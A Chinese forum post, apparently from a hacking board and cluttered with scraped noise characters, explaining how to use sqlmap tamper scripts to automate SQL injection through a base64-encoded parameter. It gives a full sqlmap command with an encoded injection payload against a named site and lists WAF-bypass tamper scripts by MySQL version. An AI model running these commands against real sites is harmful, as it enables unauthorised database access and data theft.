WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
2 `3 G: L2 @) o4 {4 O2 Z- `
" L# G% ^* d; ^sqlmap的tamper里有个base64encode.py
+ v4 z! v# u, C/ T( R- m3 b/ v# S$ F- }' v8 q f3 I
使用如下; X X% x" B- _8 a8 T
3 z' t/ Y. t t2 g! {sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
# w3 m; q7 Q# ~6 S0 \/ _% a( {+ M; f! ]
' a0 F/ {4 v8 f0 O
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
7 i5 k$ `/ T) p7 ^5 E
9 i" Y7 f( ~* W9 k. M其中常用到的bypass脚本绕过SQLMAP主要两个脚本:& Z' a2 n, \' X' L+ B7 ^$ O
; J2 k$ [! k' U* {7 L) B
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入0 i& T0 F9 w* r$ w R) n0 b7 k
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入+ m/ @% L" p- O/ x* e' l5 N
首先确定目标数据库版本,然后选择相应的脚本。
0 S4 [/ g. y* |8 ]+ ^. ^8 G-v 3 --batch --tamper "space2hash.py"
4 v9 L3 i" H [3 B! A$ N
- H @; v! s6 w$ l" P还有其他一些插件:
4 g% b. R7 k( H& z( s9 `+ {' a9 e' b/ [encodes编码 ——charencode.py
% w! G) c7 Q; h7 p! E, ~' fbase64编码 —— base64encode.py
! y! N# ?1 L( \. Q替换空格和关键字 —— halfversionedmorekeywords.py
5 S- e! H! ^* n* q1 o |
$ Q* T( }) H! b% @0 C
; Z4 P7 |+ |$ z5 K8 Z ]
5 v3 z7 W4 J' L3 x @, O1 y. t ?2 P0 W; @+ V( `
|
发表于 2013-11-23 15:50:45
收藏
支持
反对